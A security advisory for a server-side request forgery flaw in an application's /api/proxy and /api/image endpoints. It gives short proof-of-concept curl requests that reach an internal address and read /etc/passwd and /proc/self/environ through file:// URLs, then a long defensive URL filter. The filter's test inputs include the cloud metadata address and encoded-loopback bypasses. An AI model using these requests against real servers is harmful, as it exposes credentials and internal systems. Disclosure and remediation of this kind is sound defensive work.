### Key Information

#### Vulnerability Type

- SSRF (Server-Side Request Forgery)

#### Impact

- Read cloud metadata to obtain credentials and take over cloud infrastructure.
- Access internal systems.
- Read local files.

#### POC (Proof of Concept)

1. **Request**

   ```bash
   curl "http://localhost:8080/api/proxy?url=http://172.31.0.1:9696/methods/FLGTEntity-subreader_12-test10&method=POST"
   ```

   **Response**

   ```json
   {
     "status": "success",
     "data": {
       "result": "..."
     }
   }
   ```

2. **Request**

   ```bash
   curl "http://localhost:8080/api/image?url=https://example.com"
   ```

   **Response**

   ```json
   {
     "status": "success",
     "data": {
       "image": "..."
     }
   }
   ```

3. **File Access Example**

   Bun's `fetch` accepts `file://` URLs, so the same call the proxy makes on a user-supplied URL can read local files:

   ```bash
   bun -version
   v2.0.0
   cat app.js
   ```

   ```js
   // app.js: fetch() on a file:// URL returns the file's contents
   const res = await fetch('file:///etc/passwd');
   if (!res.ok) throw new Error(`HTTP error: ${res.status}`);
   const html = await res.text();
   console.log(html);
   ```

4. **Other Request and Response Examples**

   ```bash
   curl "http://localhost:8080/api/proxy?url=file:///proc/self/environ&method=POST"
   ```

#### Recommendation

- Before calling `fetch`, parse the user-supplied URL and accept only the `http:` and `https:` schemes, rejecting everything else. This removes the `file://` access that gives the PoC its local file reads (`/etc/passwd`, `/proc/self/environ`).
- A scheme check alone does not stop the first PoC request or the cloud-metadata impact, because those use `http://` against internal addresses (`172.31.0.1`, the link-local metadata range). Also reject loopback, private and link-local hosts, both as literal IPs in the parsed URL and as the addresses a hostname resolves to, and do not follow redirects from the fetched response.
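The filter described in the recommendation, written out as an added example that is not part of the original report and not the affected application's own code. It runs on Node 18+ or Bun, which both provide the global `URL` and `fetch`, and it goes beyond a plain http/https scheme check: it also rejects literal loopback, private and link-local addresses (the ranges the PoC targets and the cloud-metadata impact depend on), re-checks what a hostname resolves to, and disables redirects. The function names `validateOutboundUrl`, `safeFetch`, `isForbiddenIPv4` and `isForbiddenIPv6` and the sample inputs are hypothetical.

```javascript
// Added example, not the reported application's code: an allowlist check a
// proxy endpoint like /api/proxy should apply to the user-supplied `url`
// before calling fetch(). Names (validateOutboundUrl, safeFetch, ...) are
// hypothetical. Runs on Node 18+ or Bun (global URL and fetch).

const ALLOWED_PROTOCOLS = new Set(["http:", "https:"]);

// IPv4 ranges the proxy must never reach. The WHATWG URL parser canonicalises
// 0x7f000001, 2130706433 and 127.1 to 127.0.0.1, so only dotted-decimal
// form reaches this function.
function isForbiddenIPv4(ip) {
  const m = ip.match(/^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/);
  if (!m) return false;
  const a = Number(m[1]);
  const b = Number(m[2]);
  return (
    a === 0 ||                            // 0.0.0.0/8
    a === 10 ||                           // 10.0.0.0/8, RFC 1918
    a === 127 ||                          // 127.0.0.0/8, loopback
    (a === 100 && b >= 64 && b <= 127) || // 100.64.0.0/10, CGNAT
    (a === 169 && b === 254) ||           // 169.254.0.0/16, link-local; cloud metadata at 169.254.169.254
    (a === 172 && b >= 16 && b <= 31) ||  // 172.16.0.0/12, RFC 1918; the PoC's 172.31.0.1 is here
    (a === 192 && b === 168) ||           // 192.168.0.0/16, RFC 1918
    a >= 224                              // multicast and reserved
  );
}

// IPv6: unspecified, loopback, unique-local fc00::/7, link-local fe80::/10,
// and IPv4-mapped addresses, which the URL parser serialises as hex groups
// (::ffff:127.0.0.1 becomes ::ffff:7f00:1); both spellings are handled.
function isForbiddenIPv6(ip) {
  const v6 = ip.toLowerCase();
  if (v6 === "::" || v6 === "::1") return true;
  if (/^f[cd]/.test(v6) || /^fe[89ab]/.test(v6)) return true;
  const dotted = v6.match(/^::ffff:(\d+\.\d+\.\d+\.\d+)$/);
  if (dotted) return isForbiddenIPv4(dotted[1]);
  const hex = v6.match(/^::ffff:([0-9a-f]{1,4}):([0-9a-f]{1,4})$/);
  if (hex) {
    const hi = parseInt(hex[1], 16);
    const lo = parseInt(hex[2], 16);
    return isForbiddenIPv4(`${hi >> 8}.${hi & 255}.${lo >> 8}.${lo & 255}`);
  }
  return false;
}

// Parse first, then decide on the parsed scheme and host. A prefix test on
// the raw string ("starts with http") never sees the numeric or encoded
// host the way the real request will.
function validateOutboundUrl(input) {
  let url;
  try {
    url = new URL(String(input));
  } catch {
    return { ok: false, reason: "unparseable URL" };
  }
  if (!ALLOWED_PROTOCOLS.has(url.protocol)) {
    return { ok: false, reason: `scheme ${url.protocol} not allowed` };
  }
  if (url.username || url.password) {
    return { ok: false, reason: "credentials in URL" };
  }
  let host = url.hostname; // IPv6 literals arrive as "[...]"
  if (host.startsWith("[") && host.endsWith("]")) {
    host = host.slice(1, -1);
    if (isForbiddenIPv6(host)) return { ok: false, reason: `forbidden address ${host}` };
  } else if (host === "localhost" || host.endsWith(".localhost")) {
    return { ok: false, reason: "localhost not allowed" };
  } else if (isForbiddenIPv4(host)) {
    return { ok: false, reason: `forbidden address ${host}` };
  }
  return { ok: true, url, host };
}

// Resolve the hostname and re-check every returned address, then fetch with
// redirects disabled: an allowed public name may resolve, or redirect, to an
// internal address. A rebinding between this lookup and the connection is
// still possible; closing that needs the IP pinned at the socket layer.
async function safeFetch(input, init = {}) {
  const check = validateOutboundUrl(input);
  if (!check.ok) throw new Error(`blocked: ${check.reason}`);
  const dns = await import("node:dns");
  const addrs = await dns.promises.lookup(check.host, { all: true });
  for (const { address, family } of addrs) {
    const bad = family === 4 ? isForbiddenIPv4(address) : isForbiddenIPv6(address);
    if (bad) throw new Error(`blocked: ${check.host} resolves to ${address}`);
  }
  return fetch(check.url, { ...init, redirect: "manual" });
}

// Constructed inputs: the PoC's targets plus two encoded-loopback bypasses.
const samples = [
  "https://example.com",
  "http://172.31.0.1:9696/methods/",
  "file:///etc/passwd",
  "file:///proc/self/environ",
  "http://169.254.169.254/latest/meta-data/",
  "http://0x7f000001/",
  "http://[::ffff:127.0.0.1]/",
];
for (const s of samples) {
  const r = validateOutboundUrl(s);
  console.log(r.ok ? `ALLOW ${s}` : `BLOCK ${s} (${r.reason})`);
}
```

`validateOutboundUrl` is pure and can be unit-tested offline; `safeFetch` is the call to substitute for the bare `fetch` in the proxy handler. Returning `redirect: "manual"` responses to the client, rather than following them, is deliberate: following a redirect server-side would let an allowed public host bounce the request to an internal address after every check above has passed.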